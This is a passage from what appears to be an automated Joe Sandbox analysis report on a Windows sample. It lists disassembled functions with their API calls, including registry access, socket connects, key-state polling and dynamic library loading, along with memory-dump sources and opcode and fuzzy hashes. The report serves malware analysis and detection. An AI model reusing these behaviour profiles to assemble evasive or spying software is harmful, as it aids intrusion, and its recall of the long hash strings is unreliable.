                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                  • String ID:
                                                                  • API String ID: 4136290138-0
                                                                  • Opcode ID: f951dd1317169532905063b88354591b1fa88a235cbe366780819dc92218ebdb
                                                                  • Instruction ID: 370d2a1e7130e2dfe3be22b8ea1e5a90fad53fbfe3f14338388eb021eecced27
                                                                  • Opcode Fuzzy Hash: f951dd1317169532905063b88354591b1fa88a235cbe366780819dc92218ebdb
                                                                  • Instruction Fuzzy Hash: D9513BB5A0020AAFDF15CF58D880AAAB7B8FF4C314B158559E959EB341E730E951CBA0
                                                                  Function 003B0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003B06EE
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 003B077D
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 003B079B
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 003B07E1
                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 003B07FB
                                                                    • Part of subcall function 0036E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0039A574,?,?,00000000,00000008), ref: 0036E675
                                                                    • Part of subcall function 0036E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0039A574,?,?,00000000,00000008), ref: 0036E699
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 327935632-0
                                                                  • Opcode ID: 076e9008ddeb719165ab60f51dc4802b516bc7c225389de68ad0fc0ca5bb46cd
                                                                  • Instruction ID: 64474a7b8ad48106a6d8b8a9e238ae91ca4c0e03240c23c6f7161c2449010089
                                                                  • Opcode Fuzzy Hash: 076e9008ddeb719165ab60f51dc4802b516bc7c225389de68ad0fc0ca5bb46cd
                                                                  • Instruction Fuzzy Hash: 2C512979A00205DFCB16EFA8C481DAEB7B5FF49314F058055EA16AB361DB30EE45CB80
                                                                  Function 003B2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003B3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B2EEF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003B2F2E
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003B2F75
                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 003B2FA1
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 003B2FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 3740051246-0
                                                                  • Opcode ID: ecea6d126bc6cf8197297dc51996b8f80627e33b7635bc16ba37496a67faeb39
                                                                  • Instruction ID: 1e5ea61c1def52e4e14359d22ab9172f065ccd9c53afe893915d17d6db2d5e77
                                                                  • Opcode Fuzzy Hash: ecea6d126bc6cf8197297dc51996b8f80627e33b7635bc16ba37496a67faeb39
                                                                  • Instruction Fuzzy Hash: CE514C71218304AFD706EF54C885EABB7F9BF88708F00491DFA559B2A1DB70E909CB52
                                                                  Function 003BCCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6594a07ebce393f1d4b53e3086226e43896c3f3dedfd4469b3c3658ef502b6e
                                                                  • Instruction ID: 16ec69ca1bc50fa6df9137fb60761d600e954ecb62b87b24822b0fd3ef195d4f
                                                                  • Opcode Fuzzy Hash: e6594a07ebce393f1d4b53e3086226e43896c3f3dedfd4469b3c3658ef502b6e
                                                                  • Instruction Fuzzy Hash: 4C41D439911204EFC732DF68CC44FE9BB68EB09314F165269FA69A76E1C730AD01DA90
                                                                  Function 003A1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003A12B4
                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003A12DD
                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003A131C
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003A1341
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003A1349
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1389676194-0
                                                                  • Opcode ID: e58198fbc4a52c666a08f0108fd7ae65f55131c60cf26154ada4611a14f5e675
                                                                  • Instruction ID: e6a1e3573f14eea6b6bb44cafcb80372715cbb3c6845942dbc543aff993992ba
                                                                  • Opcode Fuzzy Hash: e58198fbc4a52c666a08f0108fd7ae65f55131c60cf26154ada4611a14f5e675
                                                                  • Instruction Fuzzy Hash: 2B410839A00505DFCF02EF64C981AAEBBF5EF09315B148099E90AAF3A1CB31ED05DB50
                                                                  Function 0036B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(000000FF), ref: 0036B64F
                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 0036B66C
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 0036B691
                                                                  • GetAsyncKeyState.USER32(00000002), ref: 0036B69F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID:
                                                                  • API String ID: 4210589936-0
                                                                  • Opcode ID: 9b26ba0a3769ae25aa10fc2d754a3830c48bf0f3d819c13f540f7e0eb5dd82ba
                                                                  • Instruction ID: 2bb7a9898022064173d842b06ffd376ed8e4dc93a40a32deb728cfb13edc7bb3
                                                                  • Opcode Fuzzy Hash: 9b26ba0a3769ae25aa10fc2d754a3830c48bf0f3d819c13f540f7e0eb5dd82ba
                                                                  • Instruction Fuzzy Hash: EC413D35508119BBDF169F64C844EE9FBB9FB05324F10836AF829D6294CB30AD94DFA1
                                                                  Function 0038B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 0038B369
                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 0038B413
                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0038B41B
                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 0038B429
                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0038B431
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  • Opcode ID: 2f2c74c545ad6e80d1960adea80c86f41cc4c4faff26ab9188c8133d7add1e39
                                                                  • Instruction ID: 855fc9d22dcf24c1547b20967e7f91504e6bdda1b6dd28b3a06f897b43914ce6
                                                                  • Opcode Fuzzy Hash: 2f2c74c545ad6e80d1960adea80c86f41cc4c4faff26ab9188c8133d7add1e39
                                                                  • Instruction Fuzzy Hash: 8E31BF7190031AEBDF05DF68DD4DA9EBBB9EB04315F114269F921AB2D1C3B0D954CB90
                                                                  Function 0038DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0038DBD7
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0038DBF4
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0038DC2C
                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0038DC52
                                                                  • _wcsstr.LIBCMT ref: 0038DC5C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 3902887630-0
                                                                  • Opcode ID: 6386c7670700d53bdf6ab7b77083b9a68114c085cf284df3138c57d5bff45f97
                                                                  • Instruction ID: 46f900bcebdeb2acbc85ff4914da056659df14e58a5b0e0a7d40350396b57abf
                                                                  • Opcode Fuzzy Hash: 6386c7670700d53bdf6ab7b77083b9a68114c085cf284df3138c57d5bff45f97
                                                                  • Instruction Fuzzy Hash: A321D772204204BBEB176B39AC49E7B7BBCDF45750F11806AF90ADA191EAA1DC41D3A0
                                                                  Function 003BDE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 003BDEB0
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003BDED4
                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003BDEEC
                                                                  • GetSystemMetrics.USER32(00000004), ref: 003BDF14
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,003A3A1E,00000000), ref: 003BDF32
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 2294984445-0
                                                                  • Opcode ID: f41ff94551531f22e2f563f24b4ec6ff3f451f4dd6fa347f389a71d7b9d5bb10
                                                                  • Instruction ID: 39d352bd8a471487c72d75352340d5bd19a9941cd1236e82ab5cad67c36d996d
                                                                  • Opcode Fuzzy Hash: f41ff94551531f22e2f563f24b4ec6ff3f451f4dd6fa347f389a71d7b9d5bb10
                                                                  • Instruction Fuzzy Hash: A621C431615216AFCB224F789C44BB637A8FB15338F160335FA26CA9E0E730D850CB80
                                                                  Function 0038BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0038BC90
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0038BCC2
                                                                  • __itow.LIBCMT ref: 0038BCDA
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0038BD00
                                                                  • __itow.LIBCMT ref: 0038BD11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: 4aa91d71f7dc3f3fd0be7cd90c5e4e63a0534bb28ea2041f2a5e2079461143a2
                                                                  • Instruction ID: 6177564a72578a65ea4e04e54c9fb232d6c0199f409f40f138ea08ae85de74da
                                                                  • Opcode Fuzzy Hash: 4aa91d71f7dc3f3fd0be7cd90c5e4e63a0534bb28ea2041f2a5e2079461143a2
                                                                  • Instruction Fuzzy Hash: 0521D4316407087BDB22BE658C46FDEBB6DAF4A310F000065F905EF191EB608A0987A1
                                                                  Function 00396318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003550E6: _wcsncpy.LIBCMT ref: 003550FA
                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,003960C3), ref: 00396369
                                                                  • GetLastError.KERNEL32(?,?,?,003960C3), ref: 00396374
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003960C3), ref: 00396388
                                                                  • _wcsrchr.LIBCMT ref: 003963AA
                                                                    • Part of subcall function 00396318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003960C3), ref: 003963E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                  • String ID:
                                                                  • API String ID: 3633006590-0
                                                                  • Opcode ID: 4e7c2c0d3530fc71f29b7bdb2222b57ff5b1a91e512be8fea79e99b4eaed4696
                                                                  • Instruction ID: 5ae59e3e3ba9aac0527efef2f5e980b1ef9d22225d6aa1246dd2ee71e202f9c2
                                                                  • Opcode Fuzzy Hash: 4e7c2c0d3530fc71f29b7bdb2222b57ff5b1a91e512be8fea79e99b4eaed4696
                                                                  • Instruction Fuzzy Hash: 7021D5355062159BEF27AB78AC83FFA33ACEF053A0F10446AF055D70E0EB60DD849A55
                                                                  Function 003A8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003AA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003AA84E
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003A8BD3
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8BE2
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 003A8BFE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 3701255441-0
                                                                  • Opcode ID: ec51f269118e75d9ce8db446d10636c47902c7318d793be5498428c88caaa7ac
                                                                  • Instruction ID: c35a06f8eaced34d2d228373128cd633a669b20e56f575e3aa83224d0b6a8a4e
                                                                  • Opcode Fuzzy Hash: ec51f269118e75d9ce8db446d10636c47902c7318d793be5498428c88caaa7ac
                                                                  • Instruction Fuzzy Hash: 812190313006149FCB12AF68DC85F7EB7ADEF49720F058459F916AB2A2CB74AC018B61
                                                                  Function 003A8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 003A8441
                                                                  • GetForegroundWindow.USER32 ref: 003A8458
                                                                  • GetDC.USER32(00000000), ref: 003A8494
                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 003A84A0
                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 003A84DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ForegroundPixelRelease
                                                                  • String ID:
                                                                  • API String ID: 4156661090-0
                                                                  • Opcode ID: f3beca4fb0d4cdaf2e43fb19151391446ceadc7ccd6c28a256a64e18b3e89321
                                                                  • Instruction ID: 25d486b66c06963cdb34c4c35ef231bbba774979639e14fac9519e9478f024ea
                                                                  • Opcode Fuzzy Hash: f3beca4fb0d4cdaf2e43fb19151391446ceadc7ccd6c28a256a64e18b3e89321
                                                                  • Instruction Fuzzy Hash: 6321A435A01204AFD705DFA5DD85A6EB7E9EF49301F048479E8499B251CF70EC04CB90
                                                                  Function 0036AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0036AFE3
                                                                  • SelectObject.GDI32(?,00000000), ref: 0036AFF2
                                                                  • BeginPath.GDI32(?), ref: 0036B009
                                                                  • SelectObject.GDI32(?,00000000), ref: 0036B033
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                  • String ID:
                                                                  • API String ID: 3225163088-0
                                                                  • Opcode ID: b847b61b105446cdc91ed6fe400f0374df83b1a11d33a3afdc90a96202cef916
                                                                  • Instruction ID: 37cc543098e7dcfa21fe0b744cf395290dfcfbd311813f568ea3091088855429
                                                                  • Opcode Fuzzy Hash: b847b61b105446cdc91ed6fe400f0374df83b1a11d33a3afdc90a96202cef916
                                                                  • Instruction Fuzzy Hash: 6E217FB0901205EFDB12DF55EC88BEE7B6CBB10355F14C22AE621A61B8C3715891CF95
                                                                  Function 0037217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __calloc_crt.LIBCMT ref: 003721A9
                                                                  • CreateThread.KERNEL32(?,?,003722DF,00000000,?,?), ref: 003721ED
                                                                  • GetLastError.KERNEL32 ref: 003721F7
                                                                  • _free.LIBCMT ref: 00372200
                                                                  • __dosmaperr.LIBCMT ref: 0037220B
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 2664167353-0
                                                                  • Opcode ID: f9bfd55991c42f48f4c5126fc9acd9681f68bcc49a1b9c34c41b3aee377aeedb
                                                                  • Instruction ID: 0ddf844df308ea2c24683506cdaf7d658b82adcb7973297948aa316d7cd4b67d
                                                                  • Opcode Fuzzy Hash: f9bfd55991c42f48f4c5126fc9acd9681f68bcc49a1b9c34c41b3aee377aeedb
                                                                  • Instruction Fuzzy Hash: B1112B33105706AFEB33AFA4DC42D9B3798EF05770B118429F91C9A142EB79C81187A0
                                                                  Function 0038ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0038ABD7
                                                                  • GetLastError.KERNEL32(?,0038A69F,?,?,?), ref: 0038ABE1
